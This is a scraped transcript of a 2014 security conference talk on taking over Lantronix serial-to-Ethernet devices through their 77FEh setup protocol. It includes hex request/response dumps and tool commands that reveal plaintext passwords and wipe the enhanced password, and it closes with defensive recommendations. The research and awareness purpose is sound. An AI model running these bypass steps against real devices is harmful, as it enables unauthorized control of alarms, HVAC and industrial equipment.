Treasures Sound-Spelling Cards Treasures Sound/Spelling Cards
Getting access to Lantronix devices: exploring treasures of 77FEh at Confidence 2014
-
Upload
vlatko-kosturjak -
Category
Technology
-
view
2.000 -
download
8
Transcript of Getting access to Lantronix devices: exploring treasures of 77FEh at Confidence 2014
DNA
Confidence 2014
Exploring treasures of 77FEhGetting access to Lantronix devices
Vlatko Kosturjak, Diverto@k0st
Who are you!?!!??
Security Jedi at DivertoBringing balance to the force
ExperienceOffensive (Penetration tester)
Defensive (Developer/System Administrator/...)
Have code in: Nmap, Metasploit, OpenVAS,
Author of free software: https://github.com/kost/
If you trust in certificatesCISSP, C|EH, CISA, CISM, CRISC, MBCI, ...
Agenda
Introduction - Lantronix
Physical access
WTF is 77FEh?
Vulnerabilities & Exploitation
Recommendations
Questions and answers
45 minutes
Lantronix
Source: www.lantronix.com
You can find them as integral part of
Alarms
HVACs
Pool monitoring systems
Sprinkler controllers
Hacked vacuum cleaners - Roombas
Embedded systems
Industrial systems
Source:http://ir.lantronix.com/phoenix.zhtml?c=122202&p=irol-newsArticle_Print&ID=904147&highlight
What they are running actually?
OSCoBos (mostly)
Evolution OS/Linux
ThreadX
Linux
Support1 or more serial ports
Modbus (few models)
10/100 Ethernet
Physical access
Like usualGame over
Serial accessNo password by design
RequirementsStandard TTL cable
BusPirate
...
Connecting to serial port...
9600 bps 8/N/1
Flow control: None
Most frequent services Available TCP/IP
Web (tcp/80)
Telnet (tcp/9999)
77FEh (tcp-udp/30718)
SNMP (udp/161)
Telnet administration interfaceWhat is this?Mostly information disclosuresSimple web serverServing applet JAR which talksto 30718 port
Device Discovery
Ask :)
Look if you have physical access
Passive
Active/ScanningStandard port scanning is fine with conservative timing
Broadcast UDP to specific Lantronix ports (30718)
BewareVersion scanning(-sV) or running vulnerability scanners may misconfigure device
Telnet administration
$ telnet 192.168.1.101 9999Trying 192.168.1.101...Connected to 192.168.1.101.Escape character is '^]'.
MAC address DEADDEADDEADSoftware version V5.8.8.3 (050801) XPTEXEAES library version 1.8.2.1Password :
So, WTF is 77FEh finally?
0x77FE = 30718 (10)
TCP/UDP protocol for device setupProprietary protocol
Used by DeviceInstaller (proprietary software from Lantronix)
Designed forSetup of device
Administration of device
Getting device info
Insecurity (sorry, had to write it, you'll see later ;) )
Sample 77FEh communication
[v] Sending 4 bytes:0x00000000 (00000) 000000f6 ....
[v] Received 30 bytes:(00000) 000000f7 00108005 58324400 df0e0000 ........X2D.....(00016) 62a7d944 00000000 00204a91 84fb b..D..... J...
./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -Q
Query setup request (4)Query setup response (4)MAC address of the device (6)Device type
Interesting request #1
[v] Sending 4 bytes:
0x00000000 (00000) 000000f8 ....
[v] Received 124 bytes:
0x00000000 (00000) 000000f9 c0a809c9 00000000 54455354 ............TEST
0x00000010 (00016) c0a80905 4c020000 141e141e 0a0a0a0a ....L...........
0x00000020 (00032) cc070000 00000000 00000000 00000000 ................
0x00000030 (00048) 00000000 00000000 00000000 00000000 ................
0x00000040 (00064) 00000000 00000000 00000000 00000000 ................
0x00000050 (00080) 00000000 00000000 00000000 00000000 ................
0x00000060 (00096) 00000000 00000000 00000000 00000000 ................
0x00000070 (00112) 00000000 00000000 00000000 ............
Query setup (4)SimplePasswordInPlaintext(4)./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -P
IPv4 (4)
Previous work
MetasploitRob Vinsonhttp://robvinson.org/blog/2012/07/08/lantronix-serial-to-ethernet/
https://github.com/robvinson/metasploit-modules
Metasploit modules for simple passwords by jgorhttp://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lantronix_telnet_password
http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lantronix_telnet_version
ToolsSimple C program by jgorhttps://github.com/jgor/lantronix-telnet-pw
But...
Simple password is not set
Device still asks for password
Further diggingEnhanced password in place
You cannot get/reset the enhanced password easily
Length is bigger (4->16)
Challenge!!!
Introduction to enhanced passwords
Source: Lantronix documentation
Feature/TypeSimple PasswordEnhanced Password
Length416
Visible in query setupyesno
Source:Mohdafri.com
Interesting request - #2
[v] Sending 4 bytes:0x00000000 (00000) 000000f4 ....
[v] Received 32 bytes:0x00000000 (00000) 000000f5 09040000 00000000 54455354 ............TEST0x00000010 (00016) 352e382e 382e3300 00000000 00000000 5.8.8.3.........0x00000020 (00032)
./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -C
SimplePasswordInPlaintext(4)Query ext versionRequest (4)Version (6)
Interesting request #3
Request to query configuration000000eX
Response to query configuration000000bX + followed by 126 bytes of setup
X=number of setup records (0 F):0 basic setup recordSimple password, IP...
1 security recordEnhanced password, AES key, SNMP...
2 specific products / situations
3 OEMs
...
Wrong! Request for security record 1 provides just zero bytes! HALF
Interesting request #4
Request to change configuration000000cX + followed by 126 bytes of setup
Response to change configuration000000bX
X=number of setup records (0 F):0 basic setup record
1 security record
2 specific products / situations
3 OEMs
Setting setup record 1 for security
[v] Sending 130 bytes:0x00000000 (00000) 000000c1 00000000 00000000 00000000 ................0x00000010 (00016) 00000000 00000000 00000000 00000000 ................0x00000020 (00032) 00000000 00007075 626c6963 00000000 ......public....0x00000030 (00048) 00000000 00000000 00000000 00000000 ................0x00000040 (00064) 00000000 00000000 00000000 00000000 ................0x00000050 (00080) 00000000 00000000 00000000 00000000 ................0x00000060 (00096) 00000000 00000000 00000000 00000000 ................0x00000070 (00112) 00000000 00000000 00000000 00000000 ................0x00000080 (00128) 0000 ..
[v] Received 4 bytes:0x00000000 (00000) 000000b1 ....
./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -E
Setting Setup record 1Was successfulSet Setup record 1(security) requestSNMPCommunityString (13)EnhancedPassword(16)
Enhanced password gone
no password to enter!
$ telnet 192.168.1.101 9999Trying 192.168.1.101...Connected to 192.168.1.101.Escape character is '^]'.
MAC address DEADDEADDEADSoftware version V5.8.8.3 (050801) XPTEXEAES library version 1.8.2.1
Press Enter for Setup Mode
Authentication Algorithm Guess
AuthenticateEnhancedPasswordSimplePassword
EnhancedNot set
Ask for enhancedAsk for simple
Display setup menu
Enhancedset
Simpleset
SimpleNot set
PasswordOK
New tool: lantronix-witchcraft
77FEh protocol implementation
77FEh security related utility
All the tricks mentioned implemented
Free software: GPL2
Requirement: Perl
Available athttps://github.com/kost/lantronix-witchcraft
Basic usage:
Display Mac address:./lantronix-witchcraft.pl -Q
Display Simple Password (up to 4 characters)./lantronix-witchcraft.pl -P
Reset Security record (together with enhanced password)./lantronix-witchcraft.pl -E
Reset Security record without AES (with enhanced password) ./lantronix-witchcraft.pl -S
Dump setup records./lantronix-witchcraft.pl -G -D
Brave enough?
One command to rule them all
Display Mac address and simple password, dump setup records, reset security records together with enhanced password:
./lantronix-witchcraft.pl -C -Q -P -E -G -D
Still wondering why automatic scanning
is bad for Lantronix?
Dump of setup record:
00000030 00 1c 00 03 00 4e 00 53 00 50 00 6c 00 61 00 79 |.....N.S.P.l.a.y|00000040 00 65 00 72 00 2f 00 39 00 2e 00 30 00 2e 00 30 |.e.r./.9...0...0|00000050 00 2e 00 32 00 39 00 38 00 30 00 3b 00 20 00 7b |...2.9.8.0.;. .{|00000060 00 30 00 30 00 30 00 30 00 41 00 41 00 30 00 30 |.0.0.0.0.A.A.0.0|00000070 00 2d 00 30 00 41 00 30 00 30 00 2d 00 30 02 ff |.-.0.A.0.0.-.0..|
Correct way
AskSomeone responsible if they could have something like that
Send broadcast query packet to 77FEh
Identify ports 30718 open (TCP or UDP)
Dump setup records
Play ;)
Check if it is still working...If yes, perfect
If not: huh, but you should restore setup records somehow ;)
It's not about Lantronix...
...they warned the vendors about it in their documentation
Source: Lantronix documentation
Disclosure Problem
It's more about vendors who implement Lantronix in their devices
Whom to report?Lantronix I guess they know their protocol ;)
OEMs hard to find all their customers ;)
AwarenessConference
Tools
But maybe it could be done...
Add white list
Encryption/SSL?
Source: Lantronix documentation
Recommendations
Have some other device to VPN/SSL tunnel the services
Telnet only through VPN or other secure channel to administration interface
Disable 77FEh if not needed
Filter out 77FEh on network devices to only allowed ones
Disable other unneccesary services (SNMP, telnet, etc).
Summary
Source: duki@fb
Summary
There are ways to pass beyond authentication (if 77FEh is enabled)Simple passwords
Enhanced passwords
ToolsMetasploit Lantronix modules
https://github.com/kost/lantronix-witchcraft
RecommendationsDisable 77FEh if not needed or Filter out 77FEh on network devices to only allowed ones
Tunnel VPN/SSL all communication to these devices
FutureThere are things to research: way to obtain enhanced password or AES keys for example
Acknowledgements - Thanks
Previous work (Simple Passwords)Rob Vinsonhttp://robvinson.org/blog/2012/07/08/lantronix-serial-to-ethernet/
https://github.com/robvinson/metasploit-modules
Metasploit modules for simple passwords by jgorhttp://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lantronix_telnet_password
http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lantronix_telnet_version
https://github.com/jgor/lantronix-telnet-pw
ColleaguesDalibor Dosegovi, hardware wizard
Thank you!
Questions and Answers@k0st
MosEisleyLab